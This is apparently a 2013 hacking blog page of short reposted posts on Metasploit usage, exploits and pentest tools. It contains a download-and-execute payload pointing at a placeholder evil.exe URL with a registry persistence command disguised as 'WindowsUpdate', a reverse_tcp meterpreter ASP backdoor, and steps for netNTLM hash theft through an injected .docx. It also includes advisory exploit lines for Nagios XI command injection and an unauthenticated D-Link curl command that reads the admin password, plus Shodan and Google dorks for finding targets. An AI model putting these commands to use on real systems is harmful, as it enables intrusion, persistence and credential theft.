Feb 7, 2013

Howto: Metasploit Use Postgresql

1. Login to postgres user
- su postgres

2. Create User for Metasploit
-  createuser msf_user -P

3. Create Database.
- createdb --owner=msf_user msf_database

4. Get the Metasploit Console
- msfconsole

5. Connect to Postgresql
- db_connect msf_user:msf_password@localhost/msf_database

6. Done.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 6, 2013

Howto: Single, Staged, Stagers Payload Of Metasploit

If you want to know about 'Stage', 'Stagers' and 'Single' payload of Metasploit, please go to the Source.

Singles are great for fire and forget, I've used as payloads for USB sticks (so the machine didn't have to have a connection to do what I needed) all the way to a pretty sneaky persistence method. One that I used quite often at CCDC was with the payload: 'windows/download_exec'. The only option this single has is 'URL'. We would put something like http://www.redteam.com/evil.exe and generate the binary:

(Yes you can use msfpayload, or msfvenom on the command line to generate payloads, but I like to stay inside of msfconsole)

Then set that to auto start when someone logs in with something like:
meterpreter > reg setval -k "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" -v "WindowsUpdate" -d "C:\\Windows\\dropper.exe"

Now all we had to do is wait for logins. If they happened to find our evil.exe binary (which download_exec makes it 'a.exe' and puts it in System32), and blocked our IP, all we had to do in replace evil.exe on our web server and wait for it to download the new one. A crude form of persistence, but it worked well.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 5, 2013

Nagios XI 2012R1.5b XSS / Command Execution / SQL Injection / CSRF

If you want to get full detail, please go to the Source.

Reflected XSS:
Alert Cloud Component:
Example URL:
alert('xss'); var aa={"a" : {"b" : "
The vulnerable code in Alert Cloud's index.php appears to have been
copied and pasted into several other components as well.
Escalation Wizard:
Example URL:
Stored XSS:
Nagios QL (aka Legacy Nagios Core Configuration Manager):
as the config name of a host escalation entry will result in the
javascript being executed when a user tries to delete that host
escalation entry.
I believe that the Legacy Nagios Core Configuration Manager and the
(regular, non legacy) Core Configuration Manager share configuration
settings in a database. I was unable to test whether script injected
via Nagios QL could be executed by using the (regular) Core
Configuration Manager because the (regular) Core Configuration Manager
appears to be broken in this release (?).
Command Execution:
Autodiscovery does not filter input properly. Any user can submit new
jobs, even regular user accounts with read only access. Autodiscovery
may not appear in the menu for some users, it may be necessary to
browse directly to the autodiscovery page.
Example (as the scan target): \; cat /etc/passwd \;
Then look at the job results.
Due to what seems to be (as far as I can tell) a very poorly thought
out sudo rule, a user could upload a custom nmap script to the server
and run it (through sudo) for easy root access.
Yes, there is a sudo rule that allows apache to run nmap as root.
Autodiscovery requires manual activation before it can be used (and
this vulnerability exploited).
Autodiscovery does use a nonce, but this can be bypassed with XSS.
Not sure what to call this, content spoofing maybe?
Whatever you would call it, this could be used for phishing (or whatever).
Nagios XI Admin Panel:
SQL Injection:
Sorry about the poor examples below, they should be enough to
demonstrate the point though.
NagiosQL (aka Legacy Nagios Core Configuration Manager):
Example URL:
Vulnerable Code:
if (isset($_GET['cname']) && ($_GET['cname'] != "")) {
        $strResult = $myDBClass->getFieldData("SELECT command_line
FROM tbl_command WHERE id='".$_GET['cname']."'");
There are other pages in NagiosQL that are also vulnerable.
Escalation Wizard:
Example URL:

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

D-Link DIR-600 / DIR-300 Command Execution / Bypass / Disclosure

If you want to get full detail, please go to the Source.

============ Vulnerable Firmware Releases - DIR-300: ============
Firmware Version : 2.12 - 18.01.2012
Firmware Version : 2.13 - 07.11.2012
============ Vulnerable Firmware Releases - DIR-600: ============
Firmware-Version : 2.12b02 - 17/01/2012
Firmware-Version : 2.13b01 - 07/11/2012
Firmware-Version : 2.14b01 - 22/01/2013
============ Device Description: ============
D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.
============ Shodan Torks ============
Shodan search:
Server: Linux, HTTP/1.1, DIR-300
Server: Linux, HTTP/1.1, DIR-600
============ Vulnerability Overview: ============
    * OS Command Injection (unauthenticated)
=> Parameter cmd
The vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands.
It is possible to start a telnetd to compromise the device.
WARNING: You do not need to be authenticated to the device!
starting a telnet server:
POST /command.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache
You do not need to be authenticated to the device for executing the malicious commands. You could prepare the whole request and execute it without any authentication details.
For example you could start the telnetd on other ports and interfaces. So with this you are able to get a full shell *h00ray*
Nmap Scan after starting the telnetd:
Nmap scan report for
Host is up (0.022s latency).
Not shown: 995 closed ports
1/tcp     filtered tcpmux
23/tcp    open     telnet  BusyBox telnetd 1.14.1 <<==!!!
    * Information disclosure:
Nice server banner to detect this type of devices easily:
Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Server: Linux, HTTP/1.1, DIR-600 Ver 2.12
    * For changing the current password there is no request to the current password
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
    * Insecure Cryptographic Storage:
There is no password hashing implemented and so it is saved in plain text on the system:
# cat var/passwd
"admin" "test" "0"
Positive Technologies has released an advisory in 2011 and D-Link has fixed this issue:
With the current version of the firmware the passwords are stored again in plaintext.
If you combine the plaintext credential vulnerability with the unauthenticated os command injection vulnerability you will get the following one liner to extract the admin password from every vulnerable device:
root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
"admin" "THESECRETPASS" "0"
    * Information Disclosure:
Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.
or try to access version.txt and have a look at the html source ;)
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267
Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Language: en
Graphcal Authentication: Disable
LAN MAC: <snip>
WAN MAC: <snip>
WLAN MAC: <snip>
These details are available without authentication.
    * Local path disclosure
Every piece of information is interesting for the attacker. With this we will get some more details about the operating system and its paths.
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Date: Sat, 01 Jan 2000 21:22:43 GMT
Content-Type: text/xml
Content-Length: 49
EPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)
    * Stored XSS via WLAN Assistent and Version Details
Injecting scripts into the parameter SSID reveals that this parameter is not properly validated for malicious input.
=> Parameter: SSID
The injected code gets executed if you try to access the file version.txt. For this you do not need to be authenticated :)
============ Solution ============
No known solution available.
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Exploit WebDav with Metasploit

Method that you will use to pwning the web server.

1. auxiliary(webdav_scanner)
2. auxiliary(webdav_internal_ip)
3. auxiliary(webdav_website_content)
4. auxiliary(webdav_test)
5. exploit(handler)
6. Create backdoor with msfpayload and msfencode
./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R |
./msfencode -t asp -o tcp443meterp.asp
Source: http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.html 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

RIPS v-0.54 : a static source code analyser for vulnerabilities in PHP webapplications.

RIPS is a tool written in PHP to find vulnerabilities in PHP applications using static code analysis. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by userinput (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis.

Source: http://seclist.us/2013/02/update-rips-v-0-54-a-static-source-code-analyser-for-vulnerabilities-in-php-webapplications.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 4, 2013

Google Dork For Lotus Notes

Try it with your risk.

inurl:nsf filetype:nsf nsf?Opendatabase

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

VMinjector Tool to Unlock guest VMs

You can use this tool and then change your password to recover it or make it as a PoC during your pentest operation.

Source: https://github.com/batistam/VMInjector

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Feb 3, 2013

Stealing netNTLM credentials by injecting UNC path into .docx

If you want to see full details, please go to the Source.

AUX Module
1.  use auxiliary/docx/word_unc_injector
3. set SKLOUTPUTPATH /output/path
4. run   
Post Module
1. use multi/handler
2. set PAYLOAD windows/meterpreter/reverse_tcp
4. exploit
.... Get the meterpreter
5. use post/multi/injector/word_unc_injector
8. set FILE TARGET\File
9. exploit
10. Open Another Metasploit Console
11. use auxiliary/server/capture/smb
12. run
13. Waiting for user open the document.

Source: http://jedicorp.com/security/exploit-dev/stealing-netntlm-credentials-by-injecting-unc-path-into-docx/         

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

HostBox SSH

HostBox SSH is a SSH password/account scanner written in python.

Source: http://packetstormsecurity.com/files/119996/HostBox-SSH-0.2.html 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

OSX apps (TextEdit) crashing in spell-checker

If you type "File:///" in any application in Mac OSX. It will be crach, detail is below.


OSX apps (TextEdit) crashing in spell-checker (I think).

Number:rdar://13128709 Date Originated:1/31/2013
Status:Open Resolved:
Product:OSX Product Version:10.8.2
Classification:Crash Reproducible:Always
open TextEdit.
type "File:///".  The capital 'F' is important.  On the third /, it crashes.

2013-01-31 15:19:47.422 TextEdit[34715:6903] assertion on /SourceCache/DataDetectorsCore/DataDetectorsCore-269.1/Sources/PushDown/DDResultExtraction.c:1576 "CFStringHasPrefix(urlVal, CFSTR("file://"))" failed :wrong extraction: File:///
2013-01-31 15:19:47.423 TextEdit[34715:6903] wrong extraction: File:///
2013-01-31 15:19:47.424 TextEdit[34715:6903] An uncaught exception was raised
2013-01-31 15:19:47.424 TextEdit[34715:6903] condition "wrong extraction: File:///"
2013-01-31 15:19:47.425 TextEdit[34715:6903] (
 0   CoreFoundation                      0x00007fff949770a6 __exceptionPreprocess + 198
 1   libobjc.A.dylib                     0x00007fff8e3023f0 objc_exception_throw + 43
 2   CoreFoundation                      0x00007fff94976e7c +[NSException raise:format:] + 204
 3   DataDetectorsCore                   0x00007fff8bf144f3 DDCrashv + 113
 4   DataDetectorsCore                   0x00007fff8bf145a6 DDCrash + 148
 5   DataDetectorsCore                   0x00007fff8bedfbd4 DDResultCopyExtractedURL + 718
 6   AppKit                              0x00007fff921dbd1a checkDataDetectors + 536
 7   AppKit                              0x00007fff921d9429 NSSpellCheckerCheckString + 13334
 8   AppKit                              0x00007fff921d5f9f -[NSTextCheckingOperation main] + 152
 9   Foundation                          0x00007fff8ad2f986 -[__NSOperationInternal start] + 684
 10  Foundation                          0x00007fff8ad371a1 __block_global_6 + 129
 11  libdispatch.dylib                   0x00007fff8e8caf01 _dispatch_call_block_and_release + 15
 12  libdispatch.dylib                   0x00007fff8e8c70b6 _dispatch_client_callout + 8
 13  libdispatch.dylib                   0x00007fff8e8c81fa _dispatch_worker_thread2 + 304
 14  libsystem_c.dylib                   0x00007fff91ab9cab _pthread_wqthread + 404
 15  libsystem_c.dylib                   0x00007fff91aa4171 start_wqthread + 13

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

The Big List Of Metasploit Video[If you want to be the Master Of Metasploit, I recommended to watch]

SecurityAegis.com has post very interesting big list of video about Metasploit. You can learn and get the experience about using,writing and real hacking with Metasploit. Try it from the Source. :)

Source: http://www.securityaegis.com/the-big-fat-metasploit-post/ 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Password Hashes Dump Tools By Bernardo Damele A. G.

This is the list of tool that useful for pentester to do the jobs.

 Download Link:: http://dl.dropbox.com/u/2330423/Copy%20of%20Password%20hashes%20dump%20tools.xlsx
Source: https://docs.google.com/spreadsheet/ccc?key=0Ak-eXPencMnydGhwR1VvamhlNEljVHlJdVkxZ2RIaWc&utm_source=buffer&buffer_share=ec1fb#gid=0 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.